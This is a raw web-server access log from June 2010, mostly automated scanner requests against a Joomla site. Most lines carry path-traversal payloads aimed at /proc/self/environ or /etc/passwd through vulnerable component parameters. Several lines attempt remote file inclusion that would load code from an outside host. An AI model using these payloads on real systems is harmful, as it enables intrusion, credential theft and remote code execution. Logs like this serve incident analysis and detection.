85.153.27.146 - - [07/Jun/2010:00:43:30 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:43:31 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
173.236.34.10 - - [07/Jun/2010:00:44:08 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:44:08 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:44:17 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:44:17 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
85.153.27.146 - - [07/Jun/2010:00:44:38 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:45:06 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:45:06 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:45:07 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.190.243.10 - - [07/Jun/2010:00:46:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:46:23 -0500] "GET //index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:46:23 -0500] "GET /logs//index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
209.200.244.57 - - [07/Jun/2010:00:46:53 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
209.200.244.57 - - [07/Jun/2010:00:46:53 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
209.200.244.57 - - [07/Jun/2010:00:46:53 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.195.112.180 - - [07/Jun/2010:00:47:22 -0500] "GET /logs/access_log.1275523200 HTTP/1.0" 200 1031782 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.60.216 - - [07/Jun/2010:00:48:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.60.216 - - [07/Jun/2010:00:48:28 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.60.216 - - [07/Jun/2010:00:48:28 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
173.236.34.10 - - [07/Jun/2010:00:48:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:48:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:48:56 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:00:48:56 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
188.72.70.56 - - [07/Jun/2010:00:49:10 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
204.236.235.245 - - [07/Jun/2010:00:49:11 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
188.72.70.56 - - [07/Jun/2010:00:49:11 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
204.236.235.245 - - [07/Jun/2010:00:49:11 -0500] "GET /costume HTTP/1.0" 301 319 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
204.236.235.245 - - [07/Jun/2010:00:49:11 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)"
209.188.90.44 - - [07/Jun/2010:00:49:36 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:49:37 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:00:49:37 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
91.190.243.10 - - [07/Jun/2010:00:51:49 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:51:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
209.188.90.44 - - [07/Jun/2010:00:52:23 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
207.46.13.101 - - [07/Jun/2010:00:52:36 -0500] "GET /logs/access_log.1211155200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.190.243.10 - - [07/Jun/2010:00:52:55 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:52:55 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
93.89.215.70 - - [07/Jun/2010:00:54:27 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
85.153.27.146 - - [07/Jun/2010:00:54:29 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:54:29 -0500] "GET /logs/access_log.1274832000//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:54:29 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:54:29 -0500] "GET //index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:00:54:30 -0500] "GET /logs//index.php?option=com_weberpcustomer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
174.133.201.194 - - [07/Jun/2010:00:55:18 -0500] "GET /logs/indek.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [07/Jun/2010:00:55:19 -0500] "GET /indek.php?option=com_peoplebook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.195.231 - - [07/Jun/2010:00:56:06 -0500] "GET /logs/access_log.1177027200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
209.188.90.44 - - [07/Jun/2010:00:57:15 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
93.89.215.70 - - [07/Jun/2010:00:57:19 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
207.46.199.200 - - [07/Jun/2010:00:57:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.89.215.70 - - [07/Jun/2010:00:57:20 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:00:57:20 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:00:58:02 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
91.190.243.10 - - [07/Jun/2010:00:58:49 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:00:58:49 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
163.24.136.10 - - [07/Jun/2010:01:03:17 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.207.129 - - [07/Jun/2010:01:03:32 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:03:32 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:03:32 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
209.188.90.44 - - [07/Jun/2010:01:03:46 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:03:46 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:03:47 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:04:12 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
163.24.136.10 - - [07/Jun/2010:01:04:20 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.207.129 - - [07/Jun/2010:01:05:06 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:05:15 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:05:15 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:05:15 -0500] "GET /logs/access_log.1271548800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:05:31 -0500] "GET /logs/access_log.1274832000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:06:12 -0500] "GET /logs/access_log.1273363200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
188.72.70.56 - - [07/Jun/2010:01:06:46 -0500] "GET /logs/access_log.1274832000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:06:46 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
188.72.70.56 - - [07/Jun/2010:01:06:47 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
62.149.207.129 - - [07/Jun/2010:01:06:49 -0500] "GET /logs/access_log.1274832000//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
209.188.90.44 - - [07/Jun/2010:01:07:57 -0500] "GET /logs/access_log.1273363200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:07:57 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
209.188.90.44 - - [07/Jun/2010:01:07:57 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.834"
212.227.248.216 - - [07/Jun/2010:01:08:27 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:08:57 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:08:58 -0500] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:08:58 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8566 "-""libwww-perl/5.805"
93.89.215.70 - - [07/Jun/2010:01:09:24 -0500] "GET /logs/access_log.1274227200/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
212.227.248.216 - - [07/Jun/2010:01:09:28 -0500] "GET /index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
94.23.0.30 - - [07/Jun/2010:01:09:33 -0500] "GET /logs/access_log.1274313600//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 364 "-""libwww-perl/5.803"
207.46.13.90 - - [07/Jun/2010:01:10:06 -0500] "GET /logs/access_log.1190764800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
72.55.146.140 - - [07/Jun/2010:01:11:09 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.55.146.140 - - [07/Jun/2010:01:11:09 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
213.175.212.36 - - [07/Jun/2010:01:11:22 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:11:22 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
213.175.212.36 - - [07/Jun/2010:01:11:22 -0500] "GET /index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.832"
62.149.207.129 - - [07/Jun/2010:01:11:53 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:11:53 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:11:53 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 200 8573 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:11:59 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 200 8573 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:11:59 -0500] "GET /logs/access_log.1271548800////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
62.149.207.129 - - [07/Jun/2010:01:11:59 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://vw-plumbing.com/vwplumbing/logs/backup1.txt??? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
173.236.34.10 - - [07/Jun/2010:01:12:33 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:01:12:33 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:01:12:34 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
173.236.34.10 - - [07/Jun/2010:01:12:34 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
209.188.90.44 - - [07/Jun/2010:01:12:54 -0500] "GET /logs/access_log.1273017600/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
91.190.243.10 - - [07/Jun/2010:01:13:26 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:01:13:26 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:01:14:25 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:01:14:25 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
85.153.27.146 - - [07/Jun/2010:01:14:28 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [07/Jun/2010:01:14:28 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.190.243.10 - - [07/Jun/2010:01:15:38 -0500] "GET /logs//index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
91.190.243.10 - - [07/Jun/2010:01:15:38 -0500] "GET //index.php?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
69.175.84.122 - - [07/Jun/2010:01:16:18 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
